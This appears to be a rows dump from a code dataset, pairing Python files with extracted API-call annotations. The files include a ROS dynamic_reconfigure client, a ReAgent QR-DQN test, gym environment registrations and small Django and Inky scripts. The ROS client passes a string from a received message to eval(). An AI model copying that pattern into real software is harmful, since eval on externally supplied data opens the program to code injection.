code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
# Software License Agreement (BSD License)
#
# Copyright (c) 2009, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of <NAME>, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Python client API for dynamic_reconfigure (L{DynamicReconfigureClient}) as well as
example server implementation (L{DynamicReconfigureServer}).
"""
from __future__ import with_statement
try:
import roslib; roslib.load_manifest('dynamic_reconfigure')
except:
pass
import rospy
import rosservice
import sys
import threading
import time
import types
from dynamic_reconfigure import DynamicReconfigureParameterException
from dynamic_reconfigure.srv import Reconfigure as ReconfigureSrv
from dynamic_reconfigure.msg import Config as ConfigMsg
from dynamic_reconfigure.msg import ConfigDescription as ConfigDescrMsg
from dynamic_reconfigure.msg import IntParameter, BoolParameter, StrParameter, DoubleParameter, ParamDescription
from dynamic_reconfigure.encoding import *
class Client(object):
"""
Python dynamic_reconfigure client API
"""
def __init__(self, name, timeout=None, config_callback=None, description_callback=None):
"""
Connect to dynamic_reconfigure server and return a client object
@param name: name of the server to connect to (usually the node name)
@type name: str
@param timeout: time to wait before giving up
@type timeout: float
@param config_callback: callback for server parameter changes
@param description_callback: internal use only as the API has not stabilized
"""
self.name = name
self.config = None
self.param_description = None
self.group_description = None
self._param_types = None
self._cv = threading.Condition()
self._config_callback = config_callback
self._description_callback = description_callback
self._set_service = self._get_service_proxy('set_parameters', timeout)
self._descriptions_sub = self._get_subscriber('parameter_descriptions', ConfigDescrMsg, self._descriptions_msg)
self._updates_sub = self._get_subscriber('parameter_updates', ConfigMsg, self._updates_msg)
def get_configuration(self, timeout=None):
"""
Return the latest received server configuration (wait to receive
one if none have been received)
@param timeout: time to wait before giving up
@type timeout: float
@return: dictionary mapping parameter names to values or None if unable to retrieve config.
@rtype: {str: value}
"""
if timeout is None or timeout == 0.0:
if self.get_configuration(timeout=1.0) is None:
print >> sys.stderr, 'Waiting for configuration...'
with self._cv:
while self.config is None:
if rospy.is_shutdown():
return None
self._cv.wait()
else:
start_time = time.time()
with self._cv:
while self.config is None:
if rospy.is_shutdown():
return None
secs_left = timeout - (time.time() - start_time)
if secs_left <= 0.0:
break
self._cv.wait(secs_left)
return self.config
def get_parameter_descriptions(self, timeout=None):
"""
UNSTABLE. Return a description of the parameters for the server.
Do not use this method as the type that is returned may change.
@param timeout: time to wait before giving up
@type timeout: float
"""
if timeout is None or timeout == 0.0:
with self._cv:
while self.param_description is None:
if rospy.is_shutdown():
return None
self._cv.wait()
else:
start_time = time.time()
with self._cv:
while self.param_description is None:
if rospy.is_shutdown():
return None
secs_left = timeout - (time.time() - start_time)
if secs_left <= 0.0:
break
self._cv.wait(secs_left)
return self.param_description
def get_group_descriptions(self, timeout=None):
if timeout is None or timeout == 0.0:
with self._cv:
while self.group_description is None:
if rospy.is_shutdown():
return None
self._cv.wait()
else:
start_time = time.time()
with self._cv:
while self.group_description is None:
if rospy.is_shutdown():
return None
secs_left = timeout - (time.time() - start_time)
if secs_left <= 0.0:
break
self._cv.wait(secs_left)
return self.group_description
def update_configuration(self, changes):
"""
Change the server's configuration
@param changes: dictionary of key value pairs for the parameters that are changing
@type changes: {str: value}
"""
# Retrieve the parameter descriptions
if self.param_description is None:
self.get_parameter_descriptions()
# Cast the parameters to the appropriate types
if self.param_description is not None:
for name, value in list(changes.items())[:]:
if name != 'groups':
dest_type = self._param_types.get(name)
if dest_type is None:
raise DynamicReconfigureParameterException('don\'t know parameter: %s' % name)
try:
found = False
descr = [x for x in self.param_description if x['name'].lower() == name.lower()][0]
# Fix not converting bools properly
if dest_type is bool and type(value) is str:
changes[name] = value.lower() in ("yes", "true", "t", "1")
found = True
# Handle enums
elif type(value) is str and not descr['edit_method'] == '':
enum_descr = eval(descr['edit_method'])
found = False
for const in enum_descr['enum']:
if value.lower() == const['name'].lower():
val_type = self._param_type_from_string(const['type'])
changes[name] = val_type(const['value'])
found = True
if not found:
if sys.version_info.major < 3:
if type(value) is unicode:
changes[name] = unicode(value)
else:
changes[name] = dest_type(value)
else:
changes[name] = dest_type(value)
except ValueError as e:
raise DynamicReconfigureParameterException('can\'t set parameter \'%s\' of %s: %s' % (name, str(dest_type), e))
if 'groups' in changes.keys():
changes['groups'] = self.update_groups(changes['groups'])
config = encode_config(changes)
msg = self._set_service(config).config
if self.group_description is None:
self.get_group_descriptions()
resp = decode_config(msg, self.group_description)
return resp
def update_groups(self, changes):
"""
Changes the servers group configuration
@param changes: dictionary of key value pairs for the parameters that are changing
@type changes: {str: value}
"""
descr = self.get_group_descriptions()
groups = []
def update_state(group, description):
for p,g in description['groups'].items():
if g['name'] == group:
description['groups'][p]['state'] = changes[group]
else:
update_state(group, g)
return description
for change in changes:
descr = update_state(change, descr)
return descr
def close(self):
"""
Close connections to the server
"""
self._descriptions_sub.unregister()
self._updates_sub.unregister()
## config_callback
def get_config_callback(self):
"""
Retrieve the config_callback
"""
return self._config_callback
def set_config_callback(self, value):
"""
Set the config_callback
"""
self._config_callback = value
if self._config_callback is not None:
self._config_callback(self.config)
config_callback = property(get_config_callback, set_config_callback)
## description_callback
def get_description_callback(self):
"""
Get the current description_callback
"""
return self._description_callback
def set_description_callback(self, value):
"""
UNSTABLE. Set the description callback. Do not use as the type of the
description callback may change.
"""
self._description_callback = value
if self._description_callback is not None:
self._description_callback(self.param_description)
description_callback = property(get_description_callback, set_description_callback)
# Implementation
def _get_service_proxy(self, suffix, timeout):
service_name = rospy.resolve_name(self.name + '/' + suffix)
if timeout is None or timeout == 0.0:
try:
rospy.wait_for_service(service_name, 1.0)
except rospy.exceptions.ROSException:
print >> sys.stderr, 'Waiting for service %s...' % service_name
rospy.wait_for_service(service_name, timeout)
else:
rospy.wait_for_service(service_name, timeout)
return rospy.ServiceProxy(service_name, ReconfigureSrv)
def _get_subscriber(self, suffix, type, callback):
topic_name = rospy.resolve_name(self.name + '/' + suffix)
return rospy.Subscriber(topic_name, type, callback=callback)
def _updates_msg(self, msg):
if self.group_description is None:
self.get_group_descriptions()
self.config = decode_config(msg, self.group_description)
with self._cv:
self._cv.notifyAll()
if self._config_callback is not None:
self._config_callback(self.config)
def _descriptions_msg(self, msg):
self.group_description = decode_description(msg)
self.param_description = extract_params(self.group_description)
# Build map from parameter name to type
self._param_types = {}
for p in self.param_description:
n, t = p.get('name'), p.get('type')
if n is not None and t is not None:
self._param_types[n] = self._param_type_from_string(t)
with self._cv:
self._cv.notifyAll()
if self._description_callback is not None:
self._description_callback(self.param_description)
def _param_type_from_string(self, type_str):
if type_str == 'int': return int
elif type_str == 'double': return float
elif type_str == 'str': return str
elif type_str == 'bool': return bool
else:
raise DynamicReconfigureParameterException('parameter has unknown type: %s. This is a bug in dynamic_reconfigure.' % type_str)
| [
"rospy.resolve_name",
"dynamic_reconfigure.DynamicReconfigureParameterException",
"rospy.is_shutdown",
"rospy.ServiceProxy",
"roslib.load_manifest",
"threading.Condition",
"rospy.Subscriber",
"time.time",
"rospy.wait_for_service"
] | [((1808, 1851), 'roslib.load_manifest', 'roslib.load_manifest', (['"""dynamic_reconfigure"""'], {}), "('dynamic_reconfigure')\n", (1828, 1851), False, 'import roslib\n'), ((3226, 3247), 'threading.Condition', 'threading.Condition', ([], {}), '()\n', (3245, 3247), False, 'import threading\n'), ((11493, 11537), 'rospy.resolve_name', 'rospy.resolve_name', (["(self.name + '/' + suffix)"], {}), "(self.name + '/' + suffix)\n", (11511, 11537), False, 'import rospy\n'), ((11939, 11987), 'rospy.ServiceProxy', 'rospy.ServiceProxy', (['service_name', 'ReconfigureSrv'], {}), '(service_name, ReconfigureSrv)\n', (11957, 11987), False, 'import rospy\n'), ((12065, 12109), 'rospy.resolve_name', 'rospy.resolve_name', (["(self.name + '/' + suffix)"], {}), "(self.name + '/' + suffix)\n", (12083, 12109), False, 'import rospy\n'), ((12134, 12187), 'rospy.Subscriber', 'rospy.Subscriber', (['topic_name', 'type'], {'callback': 'callback'}), '(topic_name, type, callback=callback)\n', (12150, 12187), False, 'import rospy\n'), ((4522, 4533), 'time.time', 'time.time', ([], {}), '()\n', (4531, 4533), False, 'import time\n'), ((5498, 5509), 'time.time', 'time.time', ([], {}), '()\n', (5507, 5509), False, 'import time\n'), ((6230, 6241), 'time.time', 'time.time', ([], {}), '()\n', (6239, 6241), False, 'import time\n'), ((11877, 11922), 'rospy.wait_for_service', 'rospy.wait_for_service', (['service_name', 'timeout'], {}), '(service_name, timeout)\n', (11899, 11922), False, 'import rospy\n'), ((11617, 11658), 'rospy.wait_for_service', 'rospy.wait_for_service', (['service_name', '(1.0)'], {}), '(service_name, 1.0)\n', (11639, 11658), False, 'import rospy\n'), ((4627, 4646), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (4644, 4646), False, 'import rospy\n'), ((5366, 5385), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (5383, 5385), False, 'import rospy\n'), ((5614, 5633), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (5631, 5633), False, 'import 
rospy\n'), ((6098, 6117), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (6115, 6117), False, 'import rospy\n'), ((6346, 6365), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (6363, 6365), False, 'import rospy\n'), ((11805, 11850), 'rospy.wait_for_service', 'rospy.wait_for_service', (['service_name', 'timeout'], {}), '(service_name, timeout)\n', (11827, 11850), False, 'import rospy\n'), ((4382, 4401), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (4399, 4401), False, 'import rospy\n'), ((7332, 7403), 'dynamic_reconfigure.DynamicReconfigureParameterException', 'DynamicReconfigureParameterException', (['("don\'t know parameter: %s" % name)'], {}), '("don\'t know parameter: %s" % name)\n', (7368, 7403), False, 'from dynamic_reconfigure import DynamicReconfigureParameterException\n'), ((13426, 13555), 'dynamic_reconfigure.DynamicReconfigureParameterException', 'DynamicReconfigureParameterException', (["('parameter has unknown type: %s. This is a bug in dynamic_reconfigure.' %\n type_str)"], {}), "(\n 'parameter has unknown type: %s. This is a bug in dynamic_reconfigure.' %\n type_str)\n", (13462, 13555), False, 'from dynamic_reconfigure import DynamicReconfigureParameterException\n'), ((4727, 4738), 'time.time', 'time.time', ([], {}), '()\n', (4736, 4738), False, 'import time\n'), ((5714, 5725), 'time.time', 'time.time', ([], {}), '()\n', (5723, 5725), False, 'import time\n'), ((6446, 6457), 'time.time', 'time.time', ([], {}), '()\n', (6455, 6457), False, 'import time\n')] |
from random import Random
from rstr import Rstr
from . import Generator
class Regex(Generator):
def __init__(self, regex, seed=None):
self.gen = Rstr(Random(seed))
self.regex = regex
def get_single(self):
return self.gen.xeger(self.regex)
| [
"random.Random"
] | [((163, 175), 'random.Random', 'Random', (['seed'], {}), '(seed)\n', (169, 175), False, 'from random import Random\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import unittest
import torch
from reagent.core.parameters import EvaluationParameters, RLParameters
from reagent.core.types import FeatureData, DiscreteDqnInput, ExtraData
from reagent.evaluation.evaluator import get_metrics_to_score
from reagent.models.dqn import FullyConnectedDQN
from reagent.training.parameters import QRDQNTrainerParameters
from reagent.training.qrdqn_trainer import QRDQNTrainer
from reagent.workflow.types import RewardOptions
class TestQRDQN(unittest.TestCase):
def setUp(self):
# preparing various components for qr-dqn trainer initialization
self.params = QRDQNTrainerParameters(actions=["1", "2"], num_atoms=11)
self.reward_options = RewardOptions()
self.metrics_to_score = get_metrics_to_score(
self.reward_options.metric_reward_values
)
self.state_dim = 10
self.action_dim = 2
self.sizes = [20, 20]
self.num_atoms = 11
self.activations = ["relu", "relu"]
self.dropout_ratio = 0
self.q_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.action_dim,
sizes=self.sizes,
num_atoms=self.num_atoms,
activations=self.activations,
dropout_ratio=self.dropout_ratio,
)
self.q_network_target = self.q_network.get_target_network()
self.x = FeatureData(float_features=torch.rand(5, 10))
self.eval_parameters = EvaluationParameters(calc_cpe_in_training=True)
self.num_output_nodes = (len(self.metrics_to_score) + 1) * len(
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `actions`.
self.params.actions
)
self.reward_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe_target = self.q_network_cpe.get_target_network()
def _construct_trainer(self, new_params=None, no_cpe=False):
reward_network = self.reward_network
q_network_cpe = self.q_network_cpe
q_network_cpe_target = self.q_network_cpe_target
evaluation = self.eval_parameters
params = self.params
if new_params is not None:
params = new_params
if no_cpe:
reward_network = q_network_cpe = q_network_cpe_target = None
evaluation = EvaluationParameters(calc_cpe_in_training=False)
return QRDQNTrainer(
q_network=self.q_network,
q_network_target=self.q_network_target,
reward_network=reward_network,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
metrics_to_score=self.metrics_to_score,
evaluation=evaluation,
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `asdict`.
**params.asdict()
)
def test_init(self):
trainer = self._construct_trainer()
quantiles = (0.5 + torch.arange(self.num_atoms).float()) / float(self.num_atoms)
self.assertTrue((torch.isclose(trainer.quantiles, quantiles)).all())
self.assertTrue((torch.isclose(trainer.reward_boosts, torch.zeros(2))).all())
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(reward_boost={"1": 1, "2": 2}),
)
reward_boost_trainer = self._construct_trainer(new_params=param_copy)
self.assertTrue(
(
torch.isclose(
reward_boost_trainer.reward_boosts, torch.tensor([1.0, 2.0])
)
).all()
)
def test_train_step_gen(self):
inp = DiscreteDqnInput(
state=FeatureData(float_features=torch.rand(3, 10)),
next_state=FeatureData(float_features=torch.rand(3, 10)),
reward=torch.ones(3, 1),
time_diff=torch.ones(3, 1) * 2,
step=torch.ones(3, 1) * 2,
not_terminal=torch.ones(3, 1), # todo: check terminal behavior
action=torch.tensor([[0, 1], [1, 0], [0, 1]]),
next_action=torch.tensor([[1, 0], [0, 1], [1, 0]]),
possible_actions_mask=torch.ones(3, 2),
possible_next_actions_mask=torch.ones(3, 2),
extras=ExtraData(),
)
mse_backward_type = type(
torch.nn.functional.mse_loss(
torch.tensor([1.0], requires_grad=True), torch.zeros(1)
).grad_fn
)
add_backward_type = type(
(
torch.tensor([1.0], requires_grad=True)
+ torch.tensor([1.0], requires_grad=True)
).grad_fn
)
mean_backward_type = type(
torch.tensor([1.0, 2.0], requires_grad=True).mean().grad_fn
)
# vanilla
trainer = self._construct_trainer()
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
self.assertEqual(type(losses[0].grad_fn), mean_backward_type)
self.assertEqual(type(losses[1].grad_fn), mse_backward_type)
self.assertEqual(type(losses[2].grad_fn), mse_backward_type)
self.assertEqual(type(losses[3].grad_fn), add_backward_type)
# no CPE
trainer = self._construct_trainer(no_cpe=True)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 2)
# seq_num
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(use_seq_num_diff_as_time_diff=True),
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# multi_steps
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(multi_steps=2)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# non_max_q
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(maxq_learning=False)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
def test_configure_optimizers(self):
trainer = self._construct_trainer()
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 4)
train_step_yield_order = [
trainer.q_network,
trainer.reward_network,
trainer.q_network_cpe,
trainer.q_network,
]
for i in range(len(train_step_yield_order)):
opt_param = optimizers[i]["optimizer"].param_groups[0]["params"][0]
loss_param = list(train_step_yield_order[i].parameters())[0]
self.assertTrue(torch.all(torch.isclose(opt_param, loss_param)))
trainer = self._construct_trainer(no_cpe=True)
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 2)
def test_get_detached_model_outputs(self):
trainer = self._construct_trainer()
q_out, q_target = trainer.get_detached_model_outputs(self.x)
self.assertEqual(q_out.shape[0], q_target.shape[0], 3)
self.assertEqual(q_out.shape[1], q_target.shape[1], 2)
| [
"reagent.training.parameters.QRDQNTrainerParameters",
"reagent.core.types.ExtraData",
"reagent.core.parameters.RLParameters",
"torch.isclose",
"reagent.evaluation.evaluator.get_metrics_to_score",
"torch.tensor",
"torch.arange",
"reagent.core.parameters.EvaluationParameters",
"reagent.models.dqn.Full... | [((702, 758), 'reagent.training.parameters.QRDQNTrainerParameters', 'QRDQNTrainerParameters', ([], {'actions': "['1', '2']", 'num_atoms': '(11)'}), "(actions=['1', '2'], num_atoms=11)\n", (724, 758), False, 'from reagent.training.parameters import QRDQNTrainerParameters\n'), ((789, 804), 'reagent.workflow.types.RewardOptions', 'RewardOptions', ([], {}), '()\n', (802, 804), False, 'from reagent.workflow.types import RewardOptions\n'), ((837, 899), 'reagent.evaluation.evaluator.get_metrics_to_score', 'get_metrics_to_score', (['self.reward_options.metric_reward_values'], {}), '(self.reward_options.metric_reward_values)\n', (857, 899), False, 'from reagent.evaluation.evaluator import get_metrics_to_score\n'), ((1136, 1324), 'reagent.models.dqn.FullyConnectedDQN', 'FullyConnectedDQN', ([], {'state_dim': 'self.state_dim', 'action_dim': 'self.action_dim', 'sizes': 'self.sizes', 'num_atoms': 'self.num_atoms', 'activations': 'self.activations', 'dropout_ratio': 'self.dropout_ratio'}), '(state_dim=self.state_dim, action_dim=self.action_dim,\n sizes=self.sizes, num_atoms=self.num_atoms, activations=self.\n activations, dropout_ratio=self.dropout_ratio)\n', (1153, 1324), False, 'from reagent.models.dqn import FullyConnectedDQN\n'), ((1561, 1608), 'reagent.core.parameters.EvaluationParameters', 'EvaluationParameters', ([], {'calc_cpe_in_training': '(True)'}), '(calc_cpe_in_training=True)\n', (1581, 1608), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((1836, 1966), 'reagent.models.dqn.FullyConnectedDQN', 'FullyConnectedDQN', ([], {'state_dim': 'self.state_dim', 'action_dim': 'self.num_output_nodes', 'sizes': 'self.sizes', 'activations': 'self.activations'}), '(state_dim=self.state_dim, action_dim=self.\n num_output_nodes, sizes=self.sizes, activations=self.activations)\n', (1853, 1966), False, 'from reagent.models.dqn import FullyConnectedDQN\n'), ((2050, 2180), 'reagent.models.dqn.FullyConnectedDQN', 
'FullyConnectedDQN', ([], {'state_dim': 'self.state_dim', 'action_dim': 'self.num_output_nodes', 'sizes': 'self.sizes', 'activations': 'self.activations'}), '(state_dim=self.state_dim, action_dim=self.\n num_output_nodes, sizes=self.sizes, activations=self.activations)\n', (2067, 2180), False, 'from reagent.models.dqn import FullyConnectedDQN\n'), ((2778, 2826), 'reagent.core.parameters.EvaluationParameters', 'EvaluationParameters', ([], {'calc_cpe_in_training': '(False)'}), '(calc_cpe_in_training=False)\n', (2798, 2826), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((1511, 1528), 'torch.rand', 'torch.rand', (['(5)', '(10)'], {}), '(5, 10)\n', (1521, 1528), False, 'import torch\n'), ((3735, 3778), 'reagent.core.parameters.RLParameters', 'RLParameters', ([], {'reward_boost': "{'1': 1, '2': 2}"}), "(reward_boost={'1': 1, '2': 2})\n", (3747, 3778), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((4289, 4305), 'torch.ones', 'torch.ones', (['(3)', '(1)'], {}), '(3, 1)\n', (4299, 4305), False, 'import torch\n'), ((4415, 4431), 'torch.ones', 'torch.ones', (['(3)', '(1)'], {}), '(3, 1)\n', (4425, 4431), False, 'import torch\n'), ((4485, 4523), 'torch.tensor', 'torch.tensor', (['[[0, 1], [1, 0], [0, 1]]'], {}), '([[0, 1], [1, 0], [0, 1]])\n', (4497, 4523), False, 'import torch\n'), ((4549, 4587), 'torch.tensor', 'torch.tensor', (['[[1, 0], [0, 1], [1, 0]]'], {}), '([[1, 0], [0, 1], [1, 0]])\n', (4561, 4587), False, 'import torch\n'), ((4623, 4639), 'torch.ones', 'torch.ones', (['(3)', '(2)'], {}), '(3, 2)\n', (4633, 4639), False, 'import torch\n'), ((4680, 4696), 'torch.ones', 'torch.ones', (['(3)', '(2)'], {}), '(3, 2)\n', (4690, 4696), False, 'import torch\n'), ((4717, 4728), 'reagent.core.types.ExtraData', 'ExtraData', ([], {}), '()\n', (4726, 4728), False, 'from reagent.core.types import FeatureData, DiscreteDqnInput, ExtraData\n'), ((6047, 6095), 'reagent.core.parameters.RLParameters', 
'RLParameters', ([], {'use_seq_num_diff_as_time_diff': '(True)'}), '(use_seq_num_diff_as_time_diff=True)\n', (6059, 6095), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((6422, 6449), 'reagent.core.parameters.RLParameters', 'RLParameters', ([], {'multi_steps': '(2)'}), '(multi_steps=2)\n', (6434, 6449), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((6773, 6806), 'reagent.core.parameters.RLParameters', 'RLParameters', ([], {'maxq_learning': '(False)'}), '(maxq_learning=False)\n', (6785, 6806), False, 'from reagent.core.parameters import EvaluationParameters, RLParameters\n'), ((3479, 3522), 'torch.isclose', 'torch.isclose', (['trainer.quantiles', 'quantiles'], {}), '(trainer.quantiles, quantiles)\n', (3492, 3522), False, 'import torch\n'), ((4329, 4345), 'torch.ones', 'torch.ones', (['(3)', '(1)'], {}), '(3, 1)\n', (4339, 4345), False, 'import torch\n'), ((4368, 4384), 'torch.ones', 'torch.ones', (['(3)', '(1)'], {}), '(3, 1)\n', (4378, 4384), False, 'import torch\n'), ((4832, 4871), 'torch.tensor', 'torch.tensor', (['[1.0]'], {'requires_grad': '(True)'}), '([1.0], requires_grad=True)\n', (4844, 4871), False, 'import torch\n'), ((4873, 4887), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (4884, 4887), False, 'import torch\n'), ((4984, 5023), 'torch.tensor', 'torch.tensor', (['[1.0]'], {'requires_grad': '(True)'}), '([1.0], requires_grad=True)\n', (4996, 5023), False, 'import torch\n'), ((5042, 5081), 'torch.tensor', 'torch.tensor', (['[1.0]'], {'requires_grad': '(True)'}), '([1.0], requires_grad=True)\n', (5054, 5081), False, 'import torch\n'), ((7620, 7656), 'torch.isclose', 'torch.isclose', (['opt_param', 'loss_param'], {}), '(opt_param, loss_param)\n', (7633, 7656), False, 'import torch\n'), ((3392, 3420), 'torch.arange', 'torch.arange', (['self.num_atoms'], {}), '(self.num_atoms)\n', (3404, 3420), False, 'import torch\n'), ((3593, 3607), 'torch.zeros', 'torch.zeros', (['(2)'], 
{}), '(2)\n', (3604, 3607), False, 'import torch\n'), ((3994, 4018), 'torch.tensor', 'torch.tensor', (['[1.0, 2.0]'], {}), '([1.0, 2.0])\n', (4006, 4018), False, 'import torch\n'), ((4180, 4197), 'torch.rand', 'torch.rand', (['(3)', '(10)'], {}), '(3, 10)\n', (4190, 4197), False, 'import torch\n'), ((4250, 4267), 'torch.rand', 'torch.rand', (['(3)', '(10)'], {}), '(3, 10)\n', (4260, 4267), False, 'import torch\n'), ((5161, 5205), 'torch.tensor', 'torch.tensor', (['[1.0, 2.0]'], {'requires_grad': '(True)'}), '([1.0, 2.0], requires_grad=True)\n', (5173, 5205), False, 'import torch\n')] |
from gym.envs.registration import register
register(
id='highway-v0',
entry_point='highway_env.envs:HighwayEnv',
)
register(
id='highway-continuous-v0',
entry_point='highway_env.envs:HighwayEnvCon',
)
register(
id='highway-continuous-intrinsic-rew-v0',
entry_point='highway_env.envs:HighwayEnvCon_intrinsic_rew',
)
register(
id='merge-v0',
entry_point='highway_env.envs:MergeEnv',
)
register(
id='roundabout-v0',
entry_point='highway_env.envs:RoundaboutEnv',
)
register(
id='two-way-v0',
entry_point='highway_env.envs:TwoWayEnv',
max_episode_steps=15
)
register(
id='parking-v0',
entry_point='highway_env.envs:ParkingEnv',
max_episode_steps=20
)
| [
"gym.envs.registration.register"
] | [((44, 112), 'gym.envs.registration.register', 'register', ([], {'id': '"""highway-v0"""', 'entry_point': '"""highway_env.envs:HighwayEnv"""'}), "(id='highway-v0', entry_point='highway_env.envs:HighwayEnv')\n", (52, 112), False, 'from gym.envs.registration import register\n'), ((125, 212), 'gym.envs.registration.register', 'register', ([], {'id': '"""highway-continuous-v0"""', 'entry_point': '"""highway_env.envs:HighwayEnvCon"""'}), "(id='highway-continuous-v0', entry_point=\n 'highway_env.envs:HighwayEnvCon')\n", (133, 212), False, 'from gym.envs.registration import register\n'), ((220, 335), 'gym.envs.registration.register', 'register', ([], {'id': '"""highway-continuous-intrinsic-rew-v0"""', 'entry_point': '"""highway_env.envs:HighwayEnvCon_intrinsic_rew"""'}), "(id='highway-continuous-intrinsic-rew-v0', entry_point=\n 'highway_env.envs:HighwayEnvCon_intrinsic_rew')\n", (228, 335), False, 'from gym.envs.registration import register\n'), ((343, 407), 'gym.envs.registration.register', 'register', ([], {'id': '"""merge-v0"""', 'entry_point': '"""highway_env.envs:MergeEnv"""'}), "(id='merge-v0', entry_point='highway_env.envs:MergeEnv')\n", (351, 407), False, 'from gym.envs.registration import register\n'), ((420, 494), 'gym.envs.registration.register', 'register', ([], {'id': '"""roundabout-v0"""', 'entry_point': '"""highway_env.envs:RoundaboutEnv"""'}), "(id='roundabout-v0', entry_point='highway_env.envs:RoundaboutEnv')\n", (428, 494), False, 'from gym.envs.registration import register\n'), ((507, 600), 'gym.envs.registration.register', 'register', ([], {'id': '"""two-way-v0"""', 'entry_point': '"""highway_env.envs:TwoWayEnv"""', 'max_episode_steps': '(15)'}), "(id='two-way-v0', entry_point='highway_env.envs:TwoWayEnv',\n max_episode_steps=15)\n", (515, 600), False, 'from gym.envs.registration import register\n'), ((612, 706), 'gym.envs.registration.register', 'register', ([], {'id': '"""parking-v0"""', 'entry_point': '"""highway_env.envs:ParkingEnv"""', 
'max_episode_steps': '(20)'}), "(id='parking-v0', entry_point='highway_env.envs:ParkingEnv',\n max_episode_steps=20)\n", (620, 706), False, 'from gym.envs.registration import register\n')] |
# -*- encoding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from django.conf.urls import patterns, include, url
from django_powerdns_api.routers import router
urlpatterns = patterns(
'',
url(r'^', include(router.urls)),
)
| [
"django.conf.urls.include"
] | [((325, 345), 'django.conf.urls.include', 'include', (['router.urls'], {}), '(router.urls)\n', (332, 345), False, 'from django.conf.urls import patterns, include, url\n')] |
#!/usr/bin/env python
import argparse
from PIL import Image
from inky import InkyPHAT
print("""Inky pHAT/wHAT: Logo
Displays the Inky pHAT/wHAT logo.
""")
type = "phat"
colour = "black"
inky_display = InkyPHAT(colour)
inky_display.set_border(inky_display.BLACK)
img = Image.open("assets/InkypHAT-212x104-bw.png")
inky_display.set_image(img)
inky_display.show() | [
"inky.InkyPHAT",
"PIL.Image.open"
] | [((205, 221), 'inky.InkyPHAT', 'InkyPHAT', (['colour'], {}), '(colour)\n', (213, 221), False, 'from inky import InkyPHAT\n'), ((273, 317), 'PIL.Image.open', 'Image.open', (['"""assets/InkypHAT-212x104-bw.png"""'], {}), "('assets/InkypHAT-212x104-bw.png')\n", (283, 317), False, 'from PIL import Image\n')] |
from django.test import TestCase
from .models import *
from django.contrib.auth.models import User
# Create your tests here.
# Shared fixtures pulled from the database at import time.
# NOTE(review): these queries execute when the module is imported and assume
# rows with id=1 already exist — they raise DoesNotExist on a fresh test DB;
